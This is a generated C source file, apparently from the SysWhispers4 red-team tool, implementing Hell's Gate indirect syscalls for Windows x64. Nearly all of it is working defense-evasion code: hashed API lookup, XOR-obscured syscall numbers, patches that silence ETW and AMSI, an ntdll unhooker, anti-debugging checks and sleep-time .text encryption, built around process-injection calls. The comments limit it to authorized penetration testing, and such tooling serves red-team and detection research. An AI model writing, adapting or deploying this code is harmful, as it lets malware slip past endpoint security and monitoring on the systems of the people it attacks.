/*
 * SW4Syscalls.c -- generated by SysWhispers4
 * DO NOT EDIT -- regenerate with syswhispers.py
 *
 * Resolution : hells_gate
 * Method     : indirect
 * Arch       : x64
 */
#include "SW4Syscalls.h"
#include <stddef.h>
#include <string.h>

/* =========================================================================
 *  Constants
 * ========================================================================= */
#define SW4_FUNC_COUNT    19U
#define SW4_MAX_EXPORTS   1024U
#define SW4_GADGET_POOL   0U
#define SW4_GADGET_MASK   (-1U)  /* pool must be power of 2 */

/* XOR key for SSN decryption */
#define SW4_XOR_KEY 0x9E40515AU
#define SW4_DECRYPT(v) ((DWORD)((v) ^ SW4_XOR_KEY))

/* DJB2 hashes of function names (compile-time) */
static const DWORD SW4_FuncHashes[SW4_FUNC_COUNT] = {
    0xBB485288U,  /* NtCreateThreadEx */
    0xB01F5300U,  /* NtWaitForSingleObject */
    0xAF9FFAABU,  /* NtFreeVirtualMemory */
    0x411B83A2U,  /* NtWriteVirtualMemory */
    0xF0146CE2U,  /* NtAllocateVirtualMemory */
    0xDAE08088U,  /* NtResumeThread */
    0xBFC8B678U,  /* NtGetContextThread */
    0x01D8A572U,  /* NtCreateSection */
    0xAED3CBA0U,  /* NtOpenProcess */
    0x0D11FB0DU,  /* NtTerminateProcess */
    0x7473FDF5U,  /* NtUnmapViewOfSection */
    0xE88BED2DU,  /* NtReadVirtualMemory */
    0x5AC9EF62U,  /* NtOpenSection */
    0x8BE68952U,  /* NtQueryInformationProcess */
    0xCD363694U,  /* NtProtectVirtualMemory */
    0xD8FDE5ECU,  /* NtSetContextThread */
    0xF866D229U,  /* NtClose */
    0x4D230412U,  /* NtQueueApcThread */
    0xDA22F84EU,  /* NtMapViewOfSection */
};

/* =========================================================================
 *  Runtime tables (populated by SW4_Initialize)
 * ========================================================================= */
DWORD  SW4_SsnTable[SW4_FUNC_COUNT];          /* SSN for each function */
PVOID SW4_SyscallAddrTable[SW4_FUNC_COUNT];  /* addr of syscall;ret in ntdll */

/* =========================================================================
 *  DJB2 hash (matches compile-time hashes above)
 * ========================================================================= */
static DWORD SW4_HashStr(const char* s) {
    DWORD h = 0x1505U;
    while (*s) { h = ((h << 5) + h) ^ (unsigned char)*s++; }
    return h;
}

/* =========================================================================
 *  Locate ntdll.dll via PEB (no Win32 API calls)
 * ========================================================================= */
static PVOID SW4_GetNtdllBase(VOID) {
    PPEB pPeb = (PPEB)__readgsqword(0x60);
    PPEB_LDR_DATA   pLdr   = pPeb->Ldr;
    PLIST_ENTRY     pHead  = &pLdr->InMemoryOrderModuleList;
    PLIST_ENTRY     pEntry = pHead->Flink; /* exe */
    pEntry = pEntry->Flink;               /* ntdll (always 2nd in InMemoryOrder) */
    PLDR_DATA_TABLE_ENTRY pMod =
        CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return pMod->DllBase;
}

/* Get own image base via PEB */
static PVOID SW4_GetOwnImageBase(VOID) {
    PPEB pPeb = (PPEB)__readgsqword(0x60);
    PLIST_ENTRY pHead = &pPeb->Ldr->InMemoryOrderModuleList;
    PLDR_DATA_TABLE_ENTRY pMod =
        CONTAINING_RECORD(pHead->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return pMod->DllBase;
}

/* =========================================================================
 *  EAT utility: find export by hash
 * ========================================================================= */
static PVOID SW4_GetProcByHash(PVOID pModule, DWORD dwHash) {
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
    PIMAGE_NT_HEADERS pNt  = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(
        (PBYTE)pModule +
        pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    PDWORD pFnArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfFunctions);
    PDWORD pNmArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfNames);
    PWORD  pOrArr = (PWORD) ((PBYTE)pModule + pExp->AddressOfNameOrdinals);

    for (DWORD i = 0; i < pExp->NumberOfNames; i++) {
        const char* pName = (const char*)((PBYTE)pModule + pNmArr[i]);
        if (SW4_HashStr(pName) == dwHash)
            return (PVOID)((PBYTE)pModule + pFnArr[pOrArr[i]]);
    }
    return NULL;
}

/* Find export by name string (for VEH-based methods) */
static PVOID SW4_GetProcByName(PVOID pModule, const char* szName) {
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
    PIMAGE_NT_HEADERS pNt  = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(
        (PBYTE)pModule +
        pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    PDWORD pFnArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfFunctions);
    PDWORD pNmArr = (PDWORD)((PBYTE)pModule + pExp->AddressOfNames);
    PWORD  pOrArr = (PWORD) ((PBYTE)pModule + pExp->AddressOfNameOrdinals);

    for (DWORD i = 0; i < pExp->NumberOfNames; i++) {
        const char* pName = (const char*)((PBYTE)pModule + pNmArr[i]);
        DWORD j = 0;
        while (pName[j] && szName[j] && pName[j] == szName[j]) j++;
        if (pName[j] == 0 && szName[j] == 0)
            return (PVOID)((PBYTE)pModule + pFnArr[pOrArr[i]]);
    }
    return NULL;
}

/* =========================================================================
 *  Insertion-sort helper for export arrays (avoids qsort dependency)
 * ========================================================================= */
static VOID SW4_SortExports(PSW4_EXPORT arr, DWORD n) {
    for (DWORD i = 1; i < n; i++) {
        SW4_EXPORT key = arr[i];
        LONG j = (LONG)i - 1;
        while (j >= 0 && arr[j].Address > key.Address) {
            arr[j + 1] = arr[j];
            j--;
        }
        arr[j + 1] = key;
    }
}

/* =========================================================================
 *  Parse PE section headers (used by multiple evasion techniques)
 * ========================================================================= */
static PIMAGE_SECTION_HEADER SW4_FindSection(PVOID pModule, const char* name) {
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pModule;
    PIMAGE_NT_HEADERS pNt  = (PIMAGE_NT_HEADERS)((PBYTE)pModule + pDos->e_lfanew);
    PIMAGE_SECTION_HEADER pSec = IMAGE_FIRST_SECTION(pNt);

    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++, pSec++) {
        BOOL match = TRUE;
        for (int j = 0; name[j]; j++) {
            if (pSec->Name[j] != (BYTE)name[j]) { match = FALSE; break; }
        }
        if (match) return pSec;
    }
    return NULL;
}

/* =========================================================================
 *  Hell's Gate SSN resolution
 *  Reads SSN from the 'mov eax, <SSN>' opcode in each ntdll stub.
 *  Pattern: 4C 8B D1 B8 <SSN_LO> <SSN_HI> 00 00
 *  Fails when the stub is hooked (first bytes overwritten by EDR jmp).
 * ========================================================================= */
static BOOL SW4_HellsGate(PVOID pNtdll) {
    for (DWORD fi = 0; fi < SW4_FUNC_COUNT; fi++) {
        PBYTE pFn = (PBYTE)SW4_GetProcByHash(pNtdll, SW4_FuncHashes[fi]);
        if (!pFn) continue;

        /* Scan up to 32 bytes for the mov eax, <SSN> pattern */
        for (DWORD k = 0; k < 32; k++) {
            /* 4C 8B D1 B8 <lo> <hi> 00 00 -- clean stub */
            if (pFn[k]     == 0x4Cu && pFn[k + 1u] == 0x8Bu &&
                pFn[k + 2u] == 0xD1u && pFn[k + 3u] == 0xB8u) {
                DWORD ssn = (DWORD)pFn[k + 4u] | ((DWORD)pFn[k + 5u] << 8u);
                SW4_SsnTable[fi] = (ssn) ^ SW4_XOR_KEY;
            /* Locate syscall;ret gadget in this stub */
            if (!SW4_SyscallAddrTable[fi]) {
                PBYTE pS = pFn;
                for (DWORD sk = 0; sk < 32; sk++) {
                    if (pS[sk] == 0x0Fu && pS[sk + 1u] == 0x05u) {
                        SW4_SyscallAddrTable[fi] = pS + sk;
                        break;
                    }
                }
            }
                break;
            }
        }
    }
    return TRUE;
}



/* =========================================================================
 *  ETW user-mode bypass
 *  Patches ntdll!EtwEventWrite to return STATUS_ACCESS_DENIED immediately,
 *  suppressing user-mode ETW event delivery from the current process.
 *
 *  NOTE: This does NOT bypass kernel-mode ETW-Ti callbacks.
 *        Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SW4_PatchEtw(VOID) {
    PVOID pNtdll  = SW4_GetNtdllBase();
    PVOID pTarget = SW4_GetProcByHash(pNtdll, 0x73CDCA72U);
    if (!pTarget) return FALSE;

    DWORD oldProt = 0;
    if (!VirtualProtect(pTarget, 16, PAGE_EXECUTE_READWRITE, &oldProt))
        return FALSE;

    /* Patch: mov eax, 0xC0000022 (STATUS_ACCESS_DENIED); ret */
    PBYTE p_patch = (PBYTE)pTarget;
    p_patch[0] = 0xB8u;
    *(DWORD*)(p_patch + 1) = 0xC0000022u;  /* STATUS_ACCESS_DENIED */
    p_patch[5] = 0xC3u;                    /* ret */

    VirtualProtect(pTarget, 16, oldProt, &oldProt);
    return TRUE;
}

/* =========================================================================
 *  AMSI bypass
 *  Patches amsi.dll!AmsiScanBuffer to always return AMSI_RESULT_CLEAN.
 *  If amsi.dll is not loaded, it returns TRUE (nothing to patch).
 *
 *  Technique: Overwrite AmsiScanBuffer with:
 *    xor eax, eax     (B8 00 00 00 80 -> mov eax, 0x80004005 replaced)
 *    ret
 *
 *  NOTE: Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SW4_PatchAmsi(VOID) {
    /* Find amsi.dll -- it may not be loaded yet */
    HMODULE hAmsi = GetModuleHandleA("amsi.dll");
    if (!hAmsi) {
        /* Try loading -- some processes load it lazily */
        hAmsi = LoadLibraryA("amsi.dll");
        if (!hAmsi) return TRUE;  /* Not present, nothing to patch */
    }

    /* Find AmsiScanBuffer using hash */
    PVOID pTarget = SW4_GetProcByHash((PVOID)hAmsi, 0x33F967CCU);
    if (!pTarget) return FALSE;

    DWORD oldProt = 0;
    if (!VirtualProtect(pTarget, 16, PAGE_EXECUTE_READWRITE, &oldProt))
        return FALSE;

    /* Patch: mov eax, 0x80070057 (E_INVALIDARG); ret
     * This makes AMSI think the scan arguments are invalid -> skip scan */
    PBYTE patch = (PBYTE)pTarget;
    patch[0] = 0xB8u;                         /* mov eax, imm32 */
    *(DWORD*)(patch + 1) = 0x80070057u;       /* E_INVALIDARG */
    patch[5] = 0xC3u;                         /* ret */

    VirtualProtect(pTarget, 16, oldProt, &oldProt);
    return TRUE;
}

/* =========================================================================
 *  ntdll Unhooking
 *  Maps a clean copy of ntdll from \KnownDlls\ntdll.dll and overwrites
 *  the .text section of the in-memory (hooked) ntdll with the clean bytes.
 *
 *  This completely removes ALL inline hooks from ntdll, making all
 *  subsequent NT API calls go through the original code paths.
 *
 *  Flow:
 *    1. Open \KnownDlls\ntdll.dll section
 *    2. Map clean copy read-only
 *    3. Find .text section in both copies
 *    4. VirtualProtect in-memory .text to RWX
 *    5. memcpy clean .text over hooked .text
 *    6. Restore original protection
 *    7. Unmap clean copy
 *
 *  NOTE: Call BEFORE SW4_Initialize() for best results (clean SSN resolution).
 *        Use only in authorized penetration testing engagements.
 * ========================================================================= */
BOOL SW4_UnhookNtdll(VOID) {
    /* We need the real ntdll functions to map the clean copy.
     * Even if hooked, they still work -- hooks just monitor/log. */
    typedef NTSTATUS (NTAPI *pfnNtOpenSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES);
    typedef NTSTATUS (NTAPI *pfnNtMapViewOfSection)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG);
    typedef NTSTATUS (NTAPI *pfnNtUnmapViewOfSection)(HANDLE, PVOID);
    typedef NTSTATUS (NTAPI *pfnNtClose)(HANDLE);

    PVOID pNtdll = SW4_GetNtdllBase();
    if (!pNtdll) return FALSE;

    pfnNtOpenSection pOpen = (pfnNtOpenSection)SW4_GetProcByHash(pNtdll, 0x5AC9EF62U);
    pfnNtMapViewOfSection pMap = (pfnNtMapViewOfSection)SW4_GetProcByHash(pNtdll, 0xDA22F84EU);
    pfnNtUnmapViewOfSection pUnmap = (pfnNtUnmapViewOfSection)SW4_GetProcByHash(pNtdll, 0x7473FDF5U);
    pfnNtClose pClose = (pfnNtClose)SW4_GetProcByHash(pNtdll, 0xF866D229U);

    if (!pOpen || !pMap || !pUnmap || !pClose) return FALSE;

    /* Open clean ntdll from KnownDlls */
    UNICODE_STRING usName;
    usName.Length        = 24 * sizeof(WCHAR);
    usName.MaximumLength = usName.Length + sizeof(WCHAR);
    usName.Buffer        = L"\\KnownDlls\\ntdll.dll";

    OBJECT_ATTRIBUTES oa;
    memset(&oa, 0, sizeof(oa));
    oa.Length     = sizeof(OBJECT_ATTRIBUTES);
    oa.ObjectName = &usName;

    HANDLE hSection = NULL;
    NTSTATUS status = pOpen(&hSection, SECTION_MAP_READ, &oa);
    if (!NT_SUCCESS(status)) return FALSE;

    PVOID  pClean = NULL;
    SIZE_T viewSize = 0;
    status = pMap(hSection, (HANDLE)-1, &pClean, 0, 0, NULL, &viewSize, 1, 0, PAGE_READONLY);
    if (!NT_SUCCESS(status)) {
        pClose(hSection);
        return FALSE;
    }

    /* Find .text section in both copies */
    PIMAGE_SECTION_HEADER pSecHooked = SW4_FindSection(pNtdll, ".text");
    PIMAGE_SECTION_HEADER pSecClean  = SW4_FindSection(pClean, ".text");

    if (!pSecHooked || !pSecClean) {
        pUnmap((HANDLE)-1, pClean);
        pClose(hSection);
        return FALSE;
    }

    /* Overwrite hooked .text with clean .text */
    PBYTE pDst = (PBYTE)pNtdll + pSecHooked->VirtualAddress;
    PBYTE pSrc = (PBYTE)pClean + pSecClean->VirtualAddress;
    DWORD dwSize = pSecClean->Misc.VirtualSize;

    DWORD oldProt = 0;
    if (!VirtualProtect(pDst, dwSize, PAGE_EXECUTE_READWRITE, &oldProt)) {
        pUnmap((HANDLE)-1, pClean);
        pClose(hSection);
        return FALSE;
    }

    memcpy(pDst, pSrc, dwSize);
    VirtualProtect(pDst, dwSize, oldProt, &oldProt);

    /* Cleanup */
    pUnmap((HANDLE)-1, pClean);
    pClose(hSection);
    return TRUE;
}

/* =========================================================================
 *  Anti-debugging checks
 *  Performs multiple checks to detect debugger presence:
 *    1. PEB.BeingDebugged flag
 *    2. PEB.NtGlobalFlag (typical debugger flags)
 *    3. RDTSC timing check (detect single-stepping)
 *    4. NtQueryInformationProcess(ProcessDebugPort)
 *    5. Heap flags check
 *    6. Instrumentation callback detection
 *
 *  Returns TRUE if environment appears clean, FALSE if debugger detected.
 * ========================================================================= */

/* Canary value for integrity validation */
#define SW4_CANARY 0x208D0507U

BOOL SW4_AntiDebugCheck(VOID) {
    PPEB pPeb;
#if defined(_WIN64)
    pPeb = (PPEB)__readgsqword(0x60);
#else
    pPeb = (PPEB)__readfsdword(0x30);
#endif

    /* Check 1: PEB.BeingDebugged */
    if (pPeb->BeingDebugged)
        return FALSE;

    /* Check 2: NtGlobalFlag -- debuggers often set 0x70 (FLG_HEAP_*) */
#if defined(_WIN64)
    DWORD ntGlobalFlag = *(DWORD*)((PBYTE)pPeb + 0xBC);
#else
    DWORD ntGlobalFlag = *(DWORD*)((PBYTE)pPeb + 0x68);
#endif
    if (ntGlobalFlag & 0x70)
        return FALSE;

    /* Check 3: RDTSC timing -- single-stepping causes large deltas */
    ULONGLONG tsc1, tsc2;
    tsc1 = __rdtsc();
    /* Dummy operations to create measurable interval */
    volatile DWORD dummy = 0;
    for (int i = 0; i < 100; i++) dummy += i;
    tsc2 = __rdtsc();
    /* Threshold: > 10000 cycles suggests debugging */
    if ((tsc2 - tsc1) > 10000)
        return FALSE;

    /* Check 4: NtQueryInformationProcess(ProcessDebugPort) */
    typedef NTSTATUS (NTAPI *pfnNtQueryInformationProcess)(
        HANDLE, DWORD, PVOID, ULONG, PULONG);
    PVOID pNtdll = SW4_GetNtdllBase();
    pfnNtQueryInformationProcess pQip = (pfnNtQueryInformationProcess)
        SW4_GetProcByHash(pNtdll, 0x8BE68952U);
    if (pQip) {
        DWORD_PTR debugPort = 0;
        NTSTATUS status = pQip((HANDLE)-1, 7 /* ProcessDebugPort */,
                              &debugPort, sizeof(debugPort), NULL);
        if (NT_SUCCESS(status) && debugPort != 0)
            return FALSE;
    }

    /* Check 5: Heap flags */
    PVOID pHeap;
#if defined(_WIN64)
    pHeap = *(PVOID*)((PBYTE)pPeb + 0x30);
    DWORD heapFlags = *(DWORD*)((PBYTE)pHeap + 0x70);
#else
    pHeap = *(PVOID*)((PBYTE)pPeb + 0x18);
    DWORD heapFlags = *(DWORD*)((PBYTE)pHeap + 0x40);
#endif
    if (heapFlags & ~0x02)  /* Only HEAP_GROWABLE should be set */
        return FALSE;

    /* Check 6: Instrumentation callback -- EDRs may set this */
    typedef NTSTATUS (NTAPI *pfnNtQip)(HANDLE, DWORD, PVOID, ULONG, PULONG);
    pfnNtQip pQip2 = (pfnNtQip)pQip;
    if (pQip2) {
        BYTE buffer[64];
        memset(buffer, 0, sizeof(buffer));
        NTSTATUS status = pQip2((HANDLE)-1, 40 /* ProcessInstrumentationCallback */,
                                buffer, sizeof(buffer), NULL);
        /* If the callback pointer is non-NULL, something is monitoring */
        if (NT_SUCCESS(status)) {
            PVOID pCallback = *(PVOID*)(buffer + sizeof(PVOID));
            if (pCallback != NULL)
                return FALSE;
        }
    }

    return TRUE;
}

/* =========================================================================
 *  Sleep with memory encryption (Ekko-style)
 *  Encrypts the PE's .text section during sleep to evade memory scanners.
 *
 *  Flow:
 *    1. Generate a random XOR key
 *    2. Encrypt own .text section with XOR
 *    3. Create a waitable timer with the specified delay
 *    4. Queue APC to decrypt .text after timer fires
 *    5. Sleep (NtWaitForSingleObject on timer)
 *    6. APC fires -> decrypts .text -> execution continues
 *
 *  This defeats:
 *    - Memory scanners during sleep (code is encrypted)
 *    - Periodic module scans
 *    - YARA/signature scans on in-memory PE
 *
 *  NOTE: Simplified version -- production use should use ROP chain
 *  (NtContinue + timer APCs) for full Ekko/Foliage behavior.
 * ========================================================================= */

/* State for sleep encryption */
static PBYTE  SW4_SleepTextBase = NULL;
static DWORD  SW4_SleepTextSize = 0;
static DWORD  SW4_SleepXorKey   = 0;

/* XOR encrypt/decrypt .text section */
static VOID SW4_XorTextSection(VOID) {
    if (!SW4_SleepTextBase || !SW4_SleepTextSize) return;

    DWORD oldProt = 0;
    VirtualProtect(SW4_SleepTextBase, SW4_SleepTextSize, PAGE_EXECUTE_READWRITE, &oldProt);

    DWORD key = SW4_SleepXorKey;
    PDWORD pData = (PDWORD)SW4_SleepTextBase;
    DWORD  count = SW4_SleepTextSize / sizeof(DWORD);

    for (DWORD i = 0; i < count; i++)
        pData[i] ^= key;

    VirtualProtect(SW4_SleepTextBase, SW4_SleepTextSize, oldProt, &oldProt);
}

/* APC callback to decrypt after sleep */
static VOID CALLBACK SW4_SleepDecryptApc(ULONG_PTR param) {
    (void)param;
    SW4_XorTextSection();  /* XOR again = decrypt */
}

VOID SW4_SleepEncrypt(DWORD dwMilliseconds) {
    /* Find own .text section */
    PVOID pImageBase = SW4_GetOwnImageBase();
    PIMAGE_SECTION_HEADER pSec = SW4_FindSection(pImageBase, ".text");
    if (!pSec) {
        /* Fallback: regular sleep */
        Sleep(dwMilliseconds);
        return;
    }

    SW4_SleepTextBase = (PBYTE)pImageBase + pSec->VirtualAddress;
    SW4_SleepTextSize = pSec->Misc.VirtualSize;

    /* Generate random XOR key using RDTSC */
    ULONGLONG tsc = __rdtsc();
    SW4_SleepXorKey = (DWORD)(tsc ^ (tsc >> 32));
    if (SW4_SleepXorKey == 0) SW4_SleepXorKey = 0xDEADBEEF;

    /* Create waitable timer */
    HANDLE hTimer = CreateWaitableTimerW(NULL, TRUE, NULL);
    if (!hTimer) {
        Sleep(dwMilliseconds);
        return;
    }

    /* Set timer: negative value = relative time in 100ns units */
    LARGE_INTEGER dueTime;
    dueTime.QuadPart = -(LONGLONG)dwMilliseconds * 10000LL;

    if (!SetWaitableTimer(hTimer, &dueTime, 0, SW4_SleepDecryptApc, NULL, FALSE)) {
        CloseHandle(hTimer);
        Sleep(dwMilliseconds);
        return;
    }

    /* Encrypt .text section */
    SW4_XorTextSection();

    /* Sleep in alertable state (allows APC to fire) */
    SleepEx(dwMilliseconds, TRUE);

    /* In case APC didn't fire, decrypt manually */
    /* (Check a canary byte to see if still encrypted) */
    PBYTE pCheck = (PBYTE)&SW4_SleepEncrypt;
    if (*pCheck != 0x48 && *pCheck != 0x40 && *pCheck != 0x55) {
        /* Likely still encrypted */
        SW4_XorTextSection();
    }

    CloseHandle(hTimer);
}

/* =========================================================================
 *  SW4_Initialize -- call once at process/shellcode startup
 * ========================================================================= */
BOOL SW4_Initialize(VOID) {
    PVOID pNtdll = SW4_GetNtdllBase();
    if (!pNtdll) return FALSE;

    return SW4_HellsGate(pNtdll);
}